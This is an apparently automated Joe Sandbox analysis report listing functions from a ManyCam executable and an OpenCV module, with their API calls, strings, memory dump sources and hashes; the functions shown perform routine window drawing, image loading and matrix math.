Instruction Fuzzy Hash: 180255B0608301CFC314DF29D585A5ABBF1FF88304F11899DE9999B2A6D731E865CF86

Function 00421CF0 Relevance: 16.8, APIs: 11, Instructions: 266windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(?,744843B1), ref: 00421D28
memset.MSVCR80 ref: 00421D39
SendMessageW.USER32(?,0000104B,00000000,0000000A), ref: 00421D6A
GetFocus.USER32 ref: 00421DBA
FillRect.USER32(00000000,?,00000000), ref: 00421DFA
FillRect.USER32(00000000,?,00000000), ref: 00421E4F
FillRect.USER32(00000000,?,00000000), ref: 00421EA1
FillRect.USER32(00000000,?,00000000), ref: 00421F01

Part of subcall function 00418B80: CreateSolidBrush.GDI32(744843B1), ref: 00418B8B

Part of subcall function 00412790: BitBlt.GDI32(FFFFFFFF,?,?,?,?,?,?,?,00CC0020), ref: 00412805

FillRect.USER32(00000000,?,00000000), ref: 00421F86
FillRect.USER32(00000000,?,00000000), ref: 00421FE4
FillRect.USER32(00000000,?,00000000), ref: 00422050

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: FillRect$BrushCreateFocusMessageSendSolidWindowmemset
String ID:
API String ID: 3296630587-0
Opcode ID: bd8db1096d9cabbb8c9f779fe1f9d4af00673308db442fb5e711c755f01d8847
Instruction ID: 1f0a01801004120218575c110c1400e9efd9d02beb715d72da90ce3cbae75a6f
Opcode Fuzzy Hash: bd8db1096d9cabbb8c9f779fe1f9d4af00673308db442fb5e711c755f01d8847
Instruction Fuzzy Hash: EAB126B0A042189FCB04EFE9CD91BDEBB74BF54308F10815EE106AB295DF346A85CB44

Function 004087B0 Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 464memoryCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000004), ref: 004087E6

Part of subcall function 0040DA70: SetWindowPos.USER32(000001E2,-0000012B,000001E2,00000000,00000000,00000000,0040880B,?,?,0040880B,00000000,00000000,00000000,000001E2,-0000012B), ref: 0040DA95

Part of subcall function 004065F0: GetParent.USER32(?), ref: 004065FD

Part of subcall function 00406670: GetParent.USER32 ref: 0040669A
Part of subcall function 00406670: GetWindowRect.USER32(?,?), ref: 004066C0
Part of subcall function 00406670: GetWindowLongW.USER32(00000000,000000F0), ref: 004066DD
Part of subcall function 00406670: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040670D

Part of subcall function 004CB5F0: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004CB626
Part of subcall function 004CB5F0: _wmkdir.MSVCR80 ref: 004CB633

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

Part of subcall function 004164A0: FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5

MoveWindow.USER32(00000000,?,00000485,00000015,0000002D,00000052,00000017,00000000,00000117,000000C6,000000AF,00000017,00000001,00000000,?,0000048A), ref: 00408C6C
MoveWindow.USER32(00000000,?,0000048B,0000011C,00000104,00000058,00000017,00000000), ref: 00408CA4
MoveWindow.USER32(00000000,?,0000048C,0000017A,00000104,00000058,00000017,00000000), ref: 00408CDC
Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 00408D50
Concurrency::task_options::get_scheduler.LIBCPMTD ref: 00408DF3
_DebugHeapAllocator.LIBCPMTD ref: 00408E57

Strings

http://manycam.com/help/effects, xrefs: 00408A61
\ManyCam\TempBackgroundPreview, xrefs: 00408853

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Window$AllocatorDebugHeapMove$ParentSystem$Base::Concurrency::details::Concurrency::task_options::get_schedulerFileFindFirstFolderInfoLongMetricsParametersPathPolicyRectSchedulerSpecial_wmkdir
String ID: \ManyCam\TempBackgroundPreview$http://manycam.com/help/effects
API String ID: 802195438-2992585156
Opcode ID: ad0380625fa3cecf4b5e51684995b29088e82c278d6510ee7f53ab51bdbc22ca
Instruction ID: 373e2faf4f294b9354e902988eb878b0a96774ffebd8d1961b2fcec7c08dd6c9
Opcode Fuzzy Hash: ad0380625fa3cecf4b5e51684995b29088e82c278d6510ee7f53ab51bdbc22ca
Instruction Fuzzy Hash: 11121F70A041189BEB24EB55CD91BED7775AF44308F0044EEA20E7B2C2DE796E94CF69

Function 004099E0 Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 433memoryCOMMON

Download Yara Rule

APIs

memset.MSVCR80 ref: 00409A4E

Part of subcall function 0040F0F0: SendMessageW.USER32(-0000012F,00000147,00000000,00000000), ref: 0040F106

Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 00409AD9
_DebugHeapAllocator.LIBCPMTD ref: 00409B1D

Strings

mce, xrefs: 00409B54
New category..., xrefs: 0040A084

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorBase::Concurrency::details::DebugHeapMessagePolicySchedulerSendmemset
String ID: New category...$mce
API String ID: 1679045135-800315401
Opcode ID: 84cff37b60f26b6a8f6ffd572ec932ad64bfde54e516b5dd0315aff2655b6aaf
Instruction ID: f62fc7b589a48f9eaf1a8544f81ff00b290309f3dd4f0067dcca3c15644f716f
Opcode Fuzzy Hash: 84cff37b60f26b6a8f6ffd572ec932ad64bfde54e516b5dd0315aff2655b6aaf
Instruction Fuzzy Hash: B5121D719012199BCB24EB65CC99BAEB7B5AF44304F1041EEE10AB72D1DB386F84CF59

Function 004D1350 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 253COMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

GetTickCount.KERNEL32 ref: 004D1414
GetTickCount.KERNEL32 ref: 004D1444
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D14CE

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

CPlayList::SetPlaybackMode (%s), xrefs: 004D1387
Playback mode is now %s., xrefs: 004D165E

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: CountTickclock$AllocatorConcurrency::cancellation_token_source::~cancellation_token_sourceDebugHeap
String ID: CPlayList::SetPlaybackMode (%s)$Playback mode is now %s.
API String ID: 1115989059-4040813284
Opcode ID: 263e4469555b9ead60d827bbea961355ac1bf97b033ce6d991a803799773ecf7
Instruction ID: 9d0510614a657932bc22ac5f2c18324a99722429085df9436aa323c14c0834bd
Opcode Fuzzy Hash: 263e4469555b9ead60d827bbea961355ac1bf97b033ce6d991a803799773ecf7
Instruction Fuzzy Hash: 66B14CB0E04218EFDB04DFD8C8A5BAEBBB1BF44308F10815EE8066B395DB789945CB55

Function 00BE08F0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

cvGetMat.GLU32(?,?,?,00000000), ref: 00BE0942
cvGetErrStatus.GLU32 ref: 00BE094D
cvGetMat.GLU32(?,?,?,00000000), ref: 00BE0994
cvGetErrStatus.GLU32 ref: 00BE099F
__alloca_probe_16.LIBCMT ref: 00BE0A61
cvError.GLU32(000000E8,cvLog,00C4124F,.\cxmathfuncs.cpp,0000063E), ref: 00BE0B81

Strings

Inner function failed., xrefs: 00BE0960
.\cxmathfuncs.cpp, xrefs: 00BE095B, 00BE0B3A, 00BE0B55, 00BE0B70
cvLog, xrefs: 00BE0965, 00BE0B44, 00BE0B5F, 00BE0B7A

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Status$Error__alloca_probe_16
String ID: .\cxmathfuncs.cpp$Inner function failed.$cvLog
API String ID: 1398756077-3989757445
Opcode ID: 6574d3a02ba2bb5e4780d80ce91e39c5d0ed0784411d04df63f3478826ce05bd
Instruction ID: 5b1d27fa8c790ff093ee47b8bcf64ffba06c097b434c48201b21ce1f20fe465a
Opcode Fuzzy Hash: 6574d3a02ba2bb5e4780d80ce91e39c5d0ed0784411d04df63f3478826ce05bd
Instruction Fuzzy Hash: B881B071E102099BCF14EFAACC81AAEF7F5FF94714F1445AAE511B7291D7B0A980CB90

Function 0050E050 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 116memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 0050E09D
_DebugHeapAllocator.LIBCPMTD ref: 0050E0C5

Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4E3
Part of subcall function 0050E4A0: _DebugHeapAllocator.LIBCPMTD ref: 0050E4FF

??0CxImage@@QAE@PAEKK@Z.CXIMAGECRT(&<Q,?,00000000,?,?,?,&<Q), ref: 0050E12E
?Encode2RGBA@CxImage@@QAE_NAAPAEAAJ_N@Z.CXIMAGECRT(00000000,00000000,00000000,&<Q,?,00000000,?,?,?,&<Q), ref: 0050E155
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,&<Q,?,00000000,?,?,?,&<Q), ref: 0050E160
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,&<Q,?,00000000,?,?,?,&<Q), ref: 0050E16C
??3@YAXPAX@Z.MSVCR80(?,00000000,?,?,00000008,00000004,00000000,00000004,00000000,00000000,00000000,00000000,00000000,&<Q,?,00000000), ref: 0050E1B7
~_Mpunct.LIBCPMTD ref: 0050E1D3

Strings

&<Q, xrefs: 0050E08C, 0050E124, 0050E1A7, 0050E08F, 0050E090, 0050E127

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapImage@@$??3@Encode2Height@MpunctWidth@
String ID: &<Q
API String ID: 2867035028-2887711709
Opcode ID: fbbaa05d77a0a2c3aee7ba4de5523e50d8f2c9dc1e9e8a6a3e8fff9c4fd9968c
Instruction ID: 4fa1d1e2ea6a526748637154a1db03ed3227427cf2602f353b57d12039db24cc
Opcode Fuzzy Hash: fbbaa05d77a0a2c3aee7ba4de5523e50d8f2c9dc1e9e8a6a3e8fff9c4fd9968c
Instruction Fuzzy Hash: 175137B1D00259AFDB14EF54CC46BEEBBB8AF54304F1082ADE519A7281DB746B84CF90

Function 004197E0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB6AA
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB711
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB76F
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB787

_DebugHeapAllocator.LIBCPMTD ref: 0041987F

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

_DebugHeapAllocator.LIBCPMTD ref: 004198BD
?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,.png,0000047D,00000046,0053E730,data\images\backgroundControl\background\,00000046,?,?,744843B1,?,0000047D,00000023,00000046), ref: 004198E0

Strings

.png, xrefs: 004198B5
S, xrefs: 00419839
0S, xrefs: 00419808
`S, xrefs: 00419816
data\images\backgroundControl\background\, xrefs: 00419877
LS, xrefs: 0041980F

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Image@@Load@
String ID: .png$0S$LS$`S$data\images\backgroundControl\background\$S
API String ID: 1315443971-3997788365
Opcode ID: 02809580c12525f98958325a7bfa43803c747b7b9b7e3c1d56384f9c16ba48a1
Instruction ID: c255484564948487ca09c12a6e8e79ec8d091f34d803f33d82e763e2732db065
Opcode Fuzzy Hash: 02809580c12525f98958325a7bfa43803c747b7b9b7e3c1d56384f9c16ba48a1
Instruction Fuzzy Hash: B13114B1D11288EBDB08EF95D886BDEBBF4FB05308F10452EE4117B281DB741949CB99

Function 0041FDA0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB6AA
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB711
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB76F
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB787

_DebugHeapAllocator.LIBCPMTD ref: 0041FE2A

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

_DebugHeapAllocator.LIBCPMTD ref: 0041FE68
?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,.png,?,?,005429BC,data\images\maindlg\,?,?,?,744843B1), ref: 0041FE8B

Strings

P*T, xrefs: 0041FDE4
data\images\maindlg\, xrefs: 0041FE22
)T, xrefs: 0041FDCF
0*T, xrefs: 0041FDDD
.png, xrefs: 0041FE60
t*T, xrefs: 0041FDEB

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Image@@Load@
String ID: .png$0*T$P*T$data\images\maindlg\$t*T$)T
API String ID: 1315443971-2295826820
Opcode ID: b28412237c5bc7e99220c79d57fe91d3a5a16ad0d12286994cfe2e3a1bceef49
Instruction ID: f5b459e8cabe00e602950f671fa5acb7728e02973b21c567d8fe0f45fcb8015d
Opcode Fuzzy Hash: b28412237c5bc7e99220c79d57fe91d3a5a16ad0d12286994cfe2e3a1bceef49
Instruction Fuzzy Hash: 353137B1D01258ABCB18DF95E985BDDBBB4FF04308F50452EF41677281CBB81A09CB99

Function 00504470 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP80(00000000,744843B1,?,00538D19,000000FF,?,005028F6,?,?,00000000,00000001), ref: 0050449A
??Bid@locale@std@@QAEIXZ.MSVCP80(?,005028F6,?,?,00000000), ref: 005044B4
?_Getfacet@locale@std@@QBEPBVfacet@12@I@Z.MSVCP80(005028F6,?,005028F6,?,?,00000000), ref: 005044C4
??1_Lockit@std@@QAE@XZ.MSVCP80(00585C98,00585C98), ref: 00504548

Strings

bad cast, xrefs: 005044F4

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getfacet@locale@std@@Vfacet@12@
String ID: bad cast
API String ID: 2261832285-3145022300
Opcode ID: 923687adefb6f0c19f08b85b92506c3169178af31264b40b8c27a0d15710eb83
Instruction ID: daf008f5657916d2d0eedf94b6e793cb89aacae9b3ddac5973414a6306a2ac1a
Opcode Fuzzy Hash: 923687adefb6f0c19f08b85b92506c3169178af31264b40b8c27a0d15710eb83
Instruction Fuzzy Hash: CE31F7B5D04209DFDB18DFA4EC45AAEBBB4FB58310F10862AE922A33D0DB745945DF50

Function 00402680 Relevance: 15.4, APIs: 10, Instructions: 409COMMON

Download Yara Rule

APIs

cvSet.CXCORE099(?,?,?,?,?,?,00000000), ref: 004026F7
cvGEMM.CXCORE099(?,?), ref: 00402755
_CIsqrt.MSVCR80 ref: 004027F6
cvGEMM.CXCORE099(?,?), ref: 00402852
cvSet2D.CXCORE099(?,?,?), ref: 004028DB
cvGEMM.CXCORE099(?,?,?,00000000,?,00000000), ref: 00402925
cvSet2D.CXCORE099(?,?,?), ref: 0040299E
cvGEMM.CXCORE099(?,?,?,00000000,?,00000000), ref: 00402A4D
cvGEMM.CXCORE099(?,?), ref: 00402ADA
cvLine.CXCORE099(?,?,?,?,?), ref: 00402B4D

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Set2$IsqrtLine
String ID:
API String ID: 2296038289-0
Opcode ID: 5380ecd6c58ae11980828ad1f4b84ea6df1e54ba14efa23bf64b0481e8ed7457
Instruction ID: 98af563dca7e08dae4733c818569099b16958337ef14baff457f1a71e3476642
Opcode Fuzzy Hash: 5380ecd6c58ae11980828ad1f4b84ea6df1e54ba14efa23bf64b0481e8ed7457
Instruction Fuzzy Hash: C8F16CB1A05601DFC305AF60D589A6ABFF0FF84740F614D88E4D5262A9E731D8B5CF86

Function 004057D0 Relevance: 15.1, APIs: 10, Instructions: 88COMMON

Download Yara Rule

APIs

cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,00000000), ref: 004057DA
cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,00000000), ref: 004057EC
cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,?,?,?,00000000), ref: 004057FE
cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405810

Part of subcall function 004053A0: cvSet.CXCORE099(?,?,?,?,00000000,?,FFFFFFFE,?,00405829), ref: 004053C2

Part of subcall function 004055D0: cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,FFFFFFFE,?,?,?,00405837,?), ref: 004055E2
Part of subcall function 004055D0: cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,FFFFFFFE,?,?,?,00405837,?), ref: 004055F4
Part of subcall function 004055D0: cvGEMM.CXCORE099(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFE), ref: 00405639
Part of subcall function 004055D0: cvSet.CXCORE099(?), ref: 00405662
Part of subcall function 004055D0: _CIcos.MSVCR80 ref: 004056A5
Part of subcall function 004055D0: _CIsin.MSVCR80 ref: 004056BA

Part of subcall function 00405740: cvSet.CXCORE099(?,?,?,?,00000000,?,FFFFFFFE,?,00405847), ref: 00405762

cvGEMM.CXCORE099(?,?), ref: 0040586A
cvGEMM.CXCORE099(?,?), ref: 00405895
cvReleaseMat.CXCORE099(?), ref: 004058A2
cvReleaseMat.CXCORE099(?), ref: 004058AF
cvReleaseMat.CXCORE099(?), ref: 004058BC
cvReleaseMat.CXCORE099(?), ref: 004058C9

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Create$Release$IcosIsin
String ID:
API String ID: 2101255812-0
Opcode ID: ca56298a2f5984f68f116382747911cee6aa4628ff14558b2bd9ab42edaa6797
Instruction ID: 0f02d04bed9878b01ec6eb7d24bee74ec2e50252446297c38aea4db588333580
Opcode Fuzzy Hash: ca56298a2f5984f68f116382747911cee6aa4628ff14558b2bd9ab42edaa6797
Instruction Fuzzy Hash: E5215CB0A05702ABD610FB649C4BB1BBBA0AFC4704F444D2CFA94662C1EA71D528CB97

Function 004888F0 Relevance: 15.1, APIs: 10, Instructions: 73COMMON

Download Yara Rule

APIs

?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(744843B1,?,?,?,?,?,?,00530C89,000000FF), ref: 00488924
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 00488936
?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 00488941
?capacity@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 00488952
?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 0048895D
??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z.MSVCP80(00000000,00000000,?,?,?,?,00530C89,000000FF), ref: 0048897B
?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@@Z.MSVCP80(?,?,?,?,?,00530C89,000000FF), ref: 00488998
??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 004889A8
?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@PB_W@Z.MSVCP80(00000000,00000000,?,?,?,?,00530C89,000000FF), ref: 004889B7
?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@PB_W@Z.MSVCP80(00000000,?,?,?,?,00530C89,000000FF), ref: 004889C6

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
